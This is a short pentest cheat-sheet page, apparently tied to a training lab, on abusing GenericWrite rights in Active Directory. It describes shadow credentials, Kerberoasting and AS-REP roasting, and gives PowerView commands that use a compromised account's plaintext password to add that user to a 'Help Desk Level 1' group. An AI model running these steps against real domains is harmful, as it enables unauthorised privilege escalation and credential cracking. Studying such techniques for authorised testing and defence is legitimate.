GenericWrite
Over a User
Attack
Description
Abuses write access to a user/computer’s msDS-KeyCredentialLink
to add authentication material and impersonate them via PKINIT
Requests a service ticket (TGS) for a specific SPN to extract and crack the associated service account’s NTLM hash.
Requests an AS-REP for a user without Kerberos pre-authentication, allowing offline cracking of their NTLM hash.
Over a Group
Adding Group Member
# creating a SecureString Object for the owned user
$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
# add the compromised user to the group
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred -Verbose
# confirm that damundsen was added to the group
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
Last updated
Was this helpful?